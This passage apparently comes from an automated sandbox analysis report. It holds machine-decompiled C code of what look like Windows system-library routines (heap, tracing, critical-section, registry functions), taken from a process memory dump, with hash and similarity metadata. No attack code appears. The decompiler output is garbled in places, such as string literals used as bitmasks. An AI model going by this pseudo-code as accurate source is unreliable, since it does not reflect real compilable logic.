                                          							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
                                          							asm("sbb esi, esi");
                                          							_t120 =  ~_t50 & _t93;
                                          						} else {
                                          							_t120 = 0;
                                          						}
                                          					}
                                          					if( !_t120 >= 0) {
                                          						L19:
                                          						_push( *_t105);
                                          						E00F595D0();
                                          						 *_t105 =  *_t105 & 0x00000000;
                                          						goto L20;
                                          					}
                                          					_t120 = E00F27F65(_t119);
                                          					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
                                          						__eflags = _t120;
                                          						if(_t120 < 0) {
                                          							goto L19;
                                          						}
                                          						 *(_t119 + 0x64) = _v12;
                                          						goto L22;
                                          					}
                                          					goto L19;
                                          				}
                                          			}


                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: RegLoadRegistryInfo
                                          • API String ID: 0-282410176
                                          • Opcode ID: c56f1d9cc1819a6387d0c6093001b13da98317a3055b7efb4062a6e98ea36df2
                                          • Instruction ID: 9e3edee220b784d99cd026d8322c951a30883c4b6bea57e4b8c2cb9f73793c44
                                          • Opcode Fuzzy Hash: c56f1d9cc1819a6387d0c6093001b13da98317a3055b7efb4062a6e98ea36df2
                                          • Instruction Fuzzy Hash: B6910A32E042159FEB31EB68CC45BAD7BA4EB01734F150265FE50A72E1DB78AD40EB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 79%
                                          			E00F96DC9(signed int __ecx, void* __edx) {
                                          				unsigned int _v8;
                                          				intOrPtr _v12;
                                          				signed int _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				char _v32;
                                          				char _v36;
                                          				char _v40;
                                          				char _v44;
                                          				char _v48;
                                          				char _v52;
                                          				char _v56;
                                          				char _v60;
                                          				void* _t87;
                                          				void* _t95;
                                          				signed char* _t96;
                                          				signed int _t107;
                                          				signed int _t136;
                                          				signed char* _t137;
                                          				void* _t157;
                                          				void* _t161;
                                          				void* _t167;
                                          				intOrPtr _t168;
                                          				void* _t174;
                                          				void* _t175;
                                          				signed int _t176;
                                          				void* _t177;
                                          
                                          				_t136 = __ecx;
                                          				_v44 = 0;
                                          				_t167 = __edx;
                                          				_v40 = 0;
                                          				_v36 = 0;
                                          				_v32 = 0;
                                          				_v60 = 0;
                                          				_v56 = 0;
                                          				_v52 = 0;
                                          				_v48 = 0;
                                          				_v16 = __ecx;
                                          				_t87 = L00F34620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
                                          				_t175 = _t87;
                                          				if(_t175 != 0) {
                                          					_t11 = _t175 + 0x30; // 0x30
                                          					 *((short*)(_t175 + 6)) = 0x14d4;
                                          					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
                                          					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
                                          					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
                                          					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
                                          					E00F96B4C(_t167, _t11, 0x214,  &_v8);
                                          					_v12 = _v8 + 0x10;
                                          					_t95 = E00F37D50();
                                          					_t137 = 0x7ffe0384;
                                          					if(_t95 == 0) {
                                          						_t96 = 0x7ffe0384;
                                          					} else {
                                          						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                          					}
                                          					_push(_t175);
                                          					_push(_v12);
                                          					_push(0x402);
                                          					_push( *_t96 & 0x000000ff);
                                          					E00F59AE0();
                                          					_t87 = L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
                                          					_t176 = _v16;
                                          					if((_t176 & 0x00000100) != 0) {
                                          						_push( &_v36);
                                          						_t157 = 4;
                                          						_t87 = E00F9795D( *((intOrPtr*)(_t167 + 8)), _t157);
                                          						if(_t87 >= 0) {
                                          							_v24 = E00F9795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
                                          							_v28 = E00F9795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
                                          							_push( &_v52);
                                          							_t161 = 5;
                                          							_t168 = E00F9795D( *((intOrPtr*)(_t167 + 8)), _t161);
                                          							_v20 = _t168;
                                          							_t107 = L00F34620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
                                          							_v16 = _t107;
                                          							if(_t107 != 0) {
                                          								_v8 = _v8 & 0x00000000;
                                          								 *(_t107 + 0x20) = _t176;
                                          								 *((short*)(_t107 + 6)) = 0x14d5;
                                          								_t47 = _t107 + 0x24; // 0x24
                                          								_t177 = _t47;
                                          								E00F96B4C( &_v36, _t177, 0xc78,  &_v8);
                                          								_t51 = _v8 + 4; // 0x4
                                          								_t178 = _t177 + (_v8 >> 1) * 2;
                                          								_v12 = _t51;
                                          								E00F96B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                                          								_v12 = _v12 + _v8;
                                          								E00F96B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                                          								_t125 = _v8;
                                          								_v12 = _v12 + _v8;
                                          								E00F96B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
                                          								_t174 = _v12 + _v8;
                                          								if(E00F37D50() != 0) {
                                          									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                          								}
                                          								_push(_v16);
                                          								_push(_t174);
                                          								_push(0x402);
                                          								_push( *_t137 & 0x000000ff);
                                          								E00F59AE0();
                                          								L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
                                          								_t168 = _v20;
                                          							}
                                          							_t87 = L00F32400( &_v36);
                                          							if(_v24 >= 0) {
                                          								_t87 = L00F32400( &_v44);
                                          							}
                                          							if(_t168 >= 0) {
                                          								_t87 = L00F32400( &_v52);
                                          							}
                                          							if(_v28 >= 0) {
                                          								return L00F32400( &_v60);
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _t87;
                                          			}
































                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: RegLoadRegistryInfo
                                          • API String ID: 0-282410176
                                          • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                          • Instruction ID: e9d18f548854c4b9ac8e82497e36100fd3702cba95adae7020709291d06f5d7f
                                          • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                          • Instruction Fuzzy Hash: C4717F71E00619EFDF10EFA5C985AEEBBB9FF48710F104069E505E7251DB34AA41DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 80%
                                          			E00FE0EA5(void* __ecx, intOrPtr __edx) {
                                          				signed int _v20;
                                          				char _v24;
                                          				intOrPtr _v28;
                                          				unsigned int _v32;
                                          				signed int _v36;
                                          				intOrPtr _v40;
                                          				char _v44;
                                          				intOrPtr _v64;
                                          				void* __ebx;
                                          				void* __edi;
                                          				signed int _t58;
                                          				unsigned int _t60;
                                          				intOrPtr _t62;
                                          				char* _t67;
                                          				char* _t69;
                                          				void* _t80;
                                          				intOrPtr _t83;
                                          				intOrPtr _t93;
                                          				intOrPtr _t115;
                                          				char _t117;
                                          				void* _t120;
                                          
                                          				_t83 = __edx;
                                          				_t117 = 0;
                                          				_t120 = __ecx;
                                          				_v44 = 0;
                                          				if(E00FDFF69(__ecx,  &_v44,  &_v32) < 0) {
                                          					L24:
                                          					_t109 = _v44;
                                          					if(_v44 != 0) {
                                          						E00FE1074(_t83, _t120, _t109, _t117, _t117);
                                          					}
                                          					L26:
                                          					return _t117;
                                          				}
                                          				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                                          				_t5 = _t83 + 1; // 0x1
                                          				_v36 = _t5 << 0xc;
                                          				_v40 = _t93;
                                          				_t58 =  *(_t93 + 0xc) & 0x40000000;
                                          				asm("sbb ebx, ebx");
                                          				_t83 = ( ~_t58 & 0x0000003c) + 4;
                                          				if(_t58 != 0) {
                                          					_push(0);
                                          					_push(0x14);
                                          					_push( &_v24);
                                          					_push(3);
                                          					_push(_t93);
                                          					_push(0xffffffff);
                                          					_t80 = E00F59730();
                                          					_t115 = _v64;
                                          					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                                          						_push(_t93);
                                          						E00FDA80D(_t115, 1, _v20, _t117);
                                          						_t83 = 4;
                                          					}
                                          				}
                                          				if(E00FDA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                                          					goto L24;
                                          				}
                                          				_t60 = _v32;
                                          				_t97 = (_t60 != 0x100000) + 1;
                                          				_t83 = (_v44 -  *0x1008b04 >> 0x14) + (_v44 -  *0x1008b04 >> 0x14);
                                          				_v28 = (_t60 != 0x100000) + 1;
                                          				_t62 = _t83 + (_t60 >> 0x14) * 2;
                                          				_v40 = _t62;
                                          				if(_t83 >= _t62) {
                                          					L10:
                                          					asm("lock xadd [eax], ecx");
                                          					asm("lock xadd [eax], ecx");
                                          					if(E00F37D50() == 0) {
                                          						_t67 = 0x7ffe0380;
                                          					} else {
                                          						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          					}
                                          					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                          						E00FD138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                                          					}
                                          					if(E00F37D50() == 0) {
                                          						_t69 = 0x7ffe0388;
                                          					} else {
                                          						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                          					}
                                          					if( *_t69 != 0) {
                                          						E00FCFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                                          					}
                                          					if(( *0x1008724 & 0x00000008) != 0) {
                                          						E00FD52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                                          					}
                                          					_t117 = _v44;
                                          					goto L26;
                                          				}
                                          				while(E00FE15B5(0x1008ae4, _t83, _t97, _t97) >= 0) {
                                          					_t97 = _v28;
                                          					_t83 = _t83 + 2;
                                          					if(_t83 < _v40) {
                                          						continue;
                                          					}
                                          					goto L10;
                                          				}
                                          				goto L24;
                                          			}

























                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: `
                                          • API String ID: 0-2679148245
                                          • Opcode ID: 6b0c9a12a9ee802327d8203e6ab686f11d4e0317b65080e0a3d992c55e75fe5c
                                          • Instruction ID: d9c50f1a6200eb44a62466f9a640c67bd6a00c1f479934d9907eb942e9fe83e5
                                          • Opcode Fuzzy Hash: 6b0c9a12a9ee802327d8203e6ab686f11d4e0317b65080e0a3d992c55e75fe5c
                                          • Instruction Fuzzy Hash: 2051CE712043829FD325DF2AD881B1BB7E5FBC4314F04092DFA8687291DB75E845DB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 86%
                                          			E00FDAE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* __esi;
                                          				void* __ebp;
                                          				signed short* _t36;
                                          				signed int _t41;
                                          				char* _t42;
                                          				intOrPtr _t43;
                                          				signed int _t47;
                                          				void* _t52;
                                          				signed int _t57;
                                          				intOrPtr _t61;
                                          				signed char _t62;
                                          				signed int _t72;
                                          				signed char _t85;
                                          				signed int _t88;
                                          
                                          				_t73 = __edx;
                                          				_push(__ecx);
                                          				_t85 = __ecx;
                                          				_v8 = __edx;
                                          				_t61 =  *((intOrPtr*)(__ecx + 0x28));
                                          				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
                                          				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
                                          					_t57 = _t57 | 0x00000001;
                                          				}
                                          				_t88 = 0;
                                          				_t36 = 0;
                                          				_t96 = _a12;
                                          				if(_a12 == 0) {
                                          					_t62 = _a8;
                                          					__eflags = _t62;
                                          					if(__eflags == 0) {
                                          						goto L12;
                                          					}
                                          					_t52 = E00FDC38B(_t85, _t73, _t57, 0);
                                          					_t62 = _a8;
                                          					 *_t62 = _t52;
                                          					_t36 = 0;
                                          					goto L11;
                                          				} else {
                                          					_t36 = E00FDACFD(_t85, _t73, _t96, _t57, _a8);
                                          					if(0 == 0 || 0 == 0xffffffff) {
                                          						_t72 = _t88;
                                          					} else {
                                          						_t72 =  *0x00000000 & 0x0000ffff;
                                          					}
                                          					 *_a12 = _t72;
                                          					_t62 = _a8;
                                          					L11:
                                          					_t73 = _v8;
                                          					L12:
                                          					if((_t57 & "RegLoadRegistryInfo") != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
                                          						L19:
                                          						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
                                          							L22:
                                          							_t74 = _v8;
                                          							__eflags = _v8;
                                          							if(__eflags != 0) {
                                          								L25:
                                          								__eflags = _t88 - 2;
                                          								if(_t88 != 2) {
                                          									__eflags = _t85 + 0x44 + (_t88 << 6);
                                          									_t88 = E00FDFDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
                                          									goto L34;
                                          								}
                                          								L26:
                                          								_t59 = _v8;
                                          								E00FDEA55(_t85, _v8, _t57);
                                          								asm("sbb esi, esi");
                                          								_t88 =  ~_t88;
                                          								_t41 = E00F37D50();
                                          								__eflags = _t41;
                                          								if(_t41 == 0) {
                                          									_t42 = 0x7ffe0380;
                                          								} else {
                                          									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          								}
                                          								__eflags =  *_t42;
                                          								if( *_t42 != 0) {
                                          									_t43 =  *[fs:0x30];
                                          									__eflags =  *(_t43 + 0x240) & 0x00000001;
                                          									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
                                          										__eflags = _t88;
                                          										if(_t88 != 0) {
                                          											E00FD1608(_t85, _t59, 3);
                                          										}
                                          									}
                                          								}
                                          								goto L34;
                                          							}
                                          							_push(_t62);
                                          							_t47 = E00FE1536(0x1008ae4, (_t74 -  *0x1008b04 >> 0x14) + (_t74 -  *0x1008b04 >> 0x14), _t88, __eflags);
                                          							__eflags = _t47;
                                          							if(_t47 == 0) {
                                          								goto L26;
                                          							}
                                          							_t74 = _v12;
                                          							_t27 = _t47 - 1; // -1
                                          							_t88 = _t27;
                                          							goto L25;
                                          						}
                                          						_t62 = _t85;
                                          						if(L00FDC323(_t62, _v8, _t57) != 0xffffffff) {
                                          							goto L22;
                                          						}
                                          						_push(_t62);
                                          						_push(_t88);
                                          						E00FDA80D(_t85, 9, _v8, _t88);
                                          						goto L34;
                                          					} else {
                                          						_t101 = _t36;
                                          						if(_t36 != 0) {
                                          							L16:
                                          							if(_t36 == 0xffffffff) {
                                          								goto L19;
                                          							}
                                          							_t62 =  *((intOrPtr*)(_t36 + 2));
                                          							if((_t62 & 0x0000000f) == 0) {
                                          								goto L19;
                                          							}
                                          							_t62 = _t62 & 0xf;
                                          							if(E00FBCB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
                                          								L34:
                                          								return _t88;
                                          							}
                                          							goto L19;
                                          						}
                                          						_t62 = _t85;
                                          						_t36 = E00FDACFD(_t62, _t73, _t101, _t57, _t62);
                                          						if(_t36 == 0) {
                                          							goto L19;
                                          						}
                                          						goto L16;
                                          					}
                                          				}
                                          			}




















                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: RegLoadRegistryInfo
                                          • API String ID: 0-282410176
                                          • Opcode ID: 6b30ede5893ce8fe122551b7895f00ed30e2c517851da43ef7ffb018990bd387
                                          • Instruction ID: 603265c6d76cde499d4a22fc080cf048e747717d8934e80c158d3669e3702a6a
                                          • Opcode Fuzzy Hash: 6b30ede5893ce8fe122551b7895f00ed30e2c517851da43ef7ffb018990bd387
                                          • Instruction Fuzzy Hash: 2341E772B006115BD7269B26C885B7BB39BAF84730F1C425BF85687391D738DC01F69A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 96%
                                          			E00F2EF40(intOrPtr __ecx) {
                                          				char _v5;
                                          				char _v6;
                                          				char _v7;
                                          				char _v8;
                                          				signed int _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				intOrPtr _t58;
                                          				char _t59;
                                          				signed char _t69;
                                          				void* _t73;
                                          				signed int _t74;
                                          				char _t79;
                                          				signed char _t81;
                                          				signed int _t85;
                                          				signed int _t87;
                                          				intOrPtr _t90;
                                          				signed char* _t91;
                                          				void* _t92;
                                          				signed int _t94;
                                          				void* _t96;
                                          
                                          				_t90 = __ecx;
                                          				_v16 = __ecx;
                                          				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
                                          					_t58 =  *((intOrPtr*)(__ecx));
                                          					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
                                          						E00F19080(_t73, __ecx, __ecx, _t92);
                                          					}
                                          				}
                                          				_t74 = 0;
                                          				_t96 =  *0x7ffe036a - 1;
                                          				_v12 = 0;
                                          				_v7 = 0;
                                          				if(_t96 > 0) {
                                          					_t74 =  *(_t90 + 0x14) & "iRegLoadRegistryInfo";
                                          					_v12 = _t74;
                                          					_v7 = _t96 != 0;
                                          				}
                                          				_t79 = 0;
                                          				_v8 = 0;
                                          				_v5 = 0;
                                          				while(1) {
                                          					L4:
                                          					_t59 = 1;
                                          					L5:
                                          					while(1) {
                                          						if(_t59 == 0) {
                                          							L12:
                                          							_t21 = _t90 + 4; // 0x779cc21e
                                          							_t87 =  *_t21;
                                          							_v6 = 0;
                                          							if(_t79 != 0) {
                                          								if((_t87 & 0x00000002) != 0) {
                                          									goto L19;
                                          								}
                                          								if((_t87 & 0x00000001) != 0) {
                                          									_v6 = 1;
                                          									_t74 = _t87 ^ 0x00000003;
                                          								} else {
                                          									_t51 = _t87 - 2; // -2
                                          									_t74 = _t51;
                                          								}
                                          								goto L15;
                                          							} else {
                                          								if((_t87 & 0x00000001) != 0) {
                                          									_v6 = 1;
                                          									_t74 = _t87 ^ 0x00000001;
                                          								} else {
                                          									_t26 = _t87 - 4; // -4
                                          									_t74 = _t26;
                                          									if((_t74 & 0x00000002) == 0) {
                                          										_t74 = _t74 - 2;
                                          									}
                                          								}
                                          								L15:
                                          								if(_t74 == _t87) {
                                          									L19:
                                          									E00F12D8A(_t74, _t90, _t87, _t90);
                                          									_t74 = _v12;
                                          									_v8 = 1;
                                          									if(_v7 != 0 && _t74 > 0x64) {
                                          										_t74 = _t74 - 1;
                                          										_v12 = _t74;
                                          									}
                                          									_t79 = _v5;
                                          									goto L4;
                                          								}
                                          								asm("lock cmpxchg [esi], ecx");
                                          								if(_t87 != _t87) {
                                          									_t74 = _v12;
                                          									_t59 = 0;
                                          									_t79 = _v5;
                                          									continue;
                                          								}
                                          								if(_v6 != 0) {
                                          									_t74 = _v12;
                                          									L25:
                                          									if(_v7 != 0) {
                                          										if(_t74 < 0x7d0) {
                                          											if(_v8 == 0) {
                                          												_t74 = _t74 + 1;
                                          											}
                                          										}
                                          										_t38 = _t90 + 0x14; // 0x0
                                          										_t39 = _t90 + 0x14; // 0x0
                                          										_t85 = ( *_t38 ^ _t74) & "iRegLoadRegistryInfo" ^  *_t39;
                                          										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                          											_t85 = _t85 & 0xff000000;
                                          										}
                                          										 *(_t90 + 0x14) = _t85;
                                          									}
                                          									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                          									 *((intOrPtr*)(_t90 + 8)) = 1;
                                          									return 0;
                                          								}
                                          								_v5 = 1;
                                          								_t87 = _t74;
                                          								goto L19;
                                          							}
                                          						}
                                          						_t94 = _t74;
                                          						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
                                          						if(_t74 == 0) {
                                          							goto L12;
                                          						} else {
                                          							_t91 = _t90 + 4;
                                          							goto L8;
                                          							L9:
                                          							while((_t81 & 0x00000001) != 0) {
                                          								_t69 = _t81;
                                          								asm("lock cmpxchg [edi], edx");
                                          								if(_t69 != _t81) {
                                          									_t81 = _t69;
                                          									continue;
                                          								}
                                          								_t90 = _v16;
                                          								goto L25;
                                          							}
                                          							asm("pause");
                                          							_t94 = _t94 - 1;
                                          							if(_t94 != 0) {
                                          								L8:
                                          								_t81 =  *_t91;
                                          								goto L9;
                                          							} else {
                                          								_t90 = _v16;
                                          								_t79 = _v5;
                                          								goto L12;
                                          							}
                                          						}
                                          					}
                                          				}
                                          			}





























                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: iRegLoadRegistryInfo
                                          • API String ID: 0-313553867
                                          • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                          • Instruction ID: bf77d66425efc0567fefc5c0521cdab66ade4d45acb08ccf859958360bed571a
                                          • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                          • Instruction Fuzzy Hash: B3512431E04269DFDB10CB68E1D07AEBBF1AF55324F2881B8D44593282C375AD88F741
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 75%
                                          			E00F4F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                                          				signed short* _v8;
                                          				signed short* _v12;
                                          				intOrPtr _v16;
                                          				char* _v20;
                                          				signed short* _v24;
                                          				char _v28;
                                          				intOrPtr _v32;
                                          				char _v36;
                                          				char _v44;
                                          				char _v52;
                                          				intOrPtr _v56;
                                          				char _v60;
                                          				intOrPtr _v72;
                                          				void* _t51;
                                          				void* _t58;
                                          				signed short _t82;
                                          				short _t84;
                                          				signed int _t91;
                                          				signed int _t100;
                                          				signed short* _t103;
                                          				void* _t108;
                                          				intOrPtr* _t109;
                                          
                                          				_t103 = __ecx;
                                          				_t82 = __edx;
                                          				_t51 = E00F34120(0, __ecx, 0,  &_v52, 0, 0, 0);
                                          				if(_t51 >= 0) {
                                          					_push(0x21);
                                          					_push(3);
                                          					_v56 =  *0x7ffe02dc;
                                          					_v20 =  &_v52;
                                          					_push( &_v44);
                                          					_v28 = 0x18;
                                          					_push( &_v28);
                                          					_push(0x100020);
                                          					_v24 = 0;
                                          					_push( &_v60);
                                          					_v16 = 0x40;
                                          					_v12 = 0;
                                          					_v8 = 0;
                                          					_t58 = E00F59830();
                                          					_t87 =  *[fs:0x30];
                                          					_t108 = _t58;
                                          					L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                                          					if(_t108 < 0) {
                                          						L11:
                                          						_t51 = _t108;
                                          					} else {
                                          						_push(4);
                                          						_push(8);
                                          						_push( &_v36);
                                          						_push( &_v44);
                                          						_push(_v60);
                                          						_t108 = E00F59990();
                                          						if(_t108 < 0) {
                                          							L10:
                                          							_push(_v60);
                                          							E00F595D0();
                                          							goto L11;
                                          						} else {
                                          							_t109 = L00F34620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                                          							if(_t109 == 0) {
                                          								_t108 = 0xc0000017;
                                          								goto L10;
                                          							} else {
                                          								_t21 = _t109 + 0x18; // 0x18
                                          								 *((intOrPtr*)(_t109 + 4)) = _v60;
                                          								 *_t109 = 1;
                                          								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                                          								 *(_t109 + 0xe) = _t82;
                                          								 *((intOrPtr*)(_t109 + 8)) = _v56;
                                          								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                                          								E00F5F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                                          								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                          								 *((short*)(_t109 + 0xc)) =  *_t103;
                                          								_t91 =  *_t103 & 0x0000ffff;
                                          								_t100 = _t91 & 0xfffffffe;
                                          								_t84 = 0x5c;
                                          								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                                          									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                                          										_push(_v60);
                                          										E00F595D0();
                                          										L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                                          										_t51 = 0xc0000106;
                                          									} else {
                                          										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                                          										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                          										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                                          										goto L5;
                                          									}
                                          								} else {
                                          									L5:
                                          									 *_a4 = _t109;
                                          									_t51 = 0;
                                          								}
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _t51;
                                          			}


























                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                          • Instruction ID: 4e2570315d377aa287a5bee40a52bcdf1806bba53ba41f48a1c572a9b0bb5c98
                                          • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                          • Instruction Fuzzy Hash: 5E51BF715047109FC321DF18C841A6BBBF8FF88710F00892DFA9597690E7B8E914DBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 75%
                                          			E00F93540(intOrPtr _a4) {
                                          				signed int _v12;
                                          				intOrPtr _v88;
                                          				intOrPtr _v92;
                                          				char _v96;
                                          				char _v352;
                                          				char _v1072;
                                          				intOrPtr _v1140;
                                          				intOrPtr _v1148;
                                          				char _v1152;
                                          				char _v1156;
                                          				char _v1160;
                                          				char _v1164;
                                          				char _v1168;
                                          				char* _v1172;
                                          				short _v1174;
                                          				char _v1176;
                                          				char _v1180;
                                          				char _v1192;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				short _t41;
                                          				short _t42;
                                          				intOrPtr _t80;
                                          				intOrPtr _t81;
                                          				signed int _t82;
                                          				void* _t83;
                                          
                                          				_v12 =  *0x100d360 ^ _t82;
                                          				_t41 = 0x14;
                                          				_v1176 = _t41;
                                          				_t42 = 0x16;
                                          				_v1174 = _t42;
                                          				_v1164 = 0x100;
                                          				_v1172 = L"BinaryHash";
                                          				_t81 = E00F50BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                                          				if(_t81 < 0) {
                                          					L11:
                                          					_t75 = _t81;
                                          					E00F93706(0, _t81, _t79, _t80);
                                          					L12:
                                          					if(_a4 != 0xc000047f) {
                                          						E00F5FA60( &_v1152, 0, 0x50);
                                          						_v1152 = 0x60c201e;
                                          						_v1148 = 1;
                                          						_v1140 = E00F93540;
                                          						E00F5FA60( &_v1072, 0, 0x2cc);
                                          						_push( &_v1072);
                                          						E00F6DDD0( &_v1072, _t75, _t79, _t80, _t81);
                                          						E00FA0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                                          						_push(_v1152);
                                          						_push(0xffffffff);
                                          						E00F597C0();
                                          					}
                                          					return E00F5B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                                          				}
                                          				_t79 =  &_v352;
                                          				_t81 = E00F93971(0, _a4,  &_v352,  &_v1156);
                                          				if(_t81 < 0) {
                                          					goto L11;
                                          				}
                                          				_t75 = _v1156;
                                          				_t79 =  &_v1160;
                                          				_t81 = E00F93884(_v1156,  &_v1160,  &_v1168);
                                          				if(_t81 >= 0) {
                                          					_t80 = _v1160;
                                          					E00F5FA60( &_v96, 0, 0x50);
                                          					_t83 = _t83 + 0xc;
                                          					_push( &_v1180);
                                          					_push(0x50);
                                          					_push( &_v96);
                                          					_push(2);
                                          					_push( &_v1176);
                                          					_push(_v1156);
                                          					_t81 = E00F59650();
                                          					if(_t81 >= 0) {
                                          						if(_v92 != 3 || _v88 == 0) {
                                          							_t81 = 0xc000090b;
                                          						}
                                          						if(_t81 >= 0) {
                                          							_t75 = _a4;
                                          							_t79 =  &_v352;
                                          							E00F93787(_a4,  &_v352, _t80);
                                          						}
                                          					}
                                          					L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                                          				}
                                          				_push(_v1156);
                                          				E00F595D0();
                                          				if(_t81 >= 0) {
                                          					goto L12;
                                          				} else {
                                          					goto L11;
                                          				}
                                          			}
































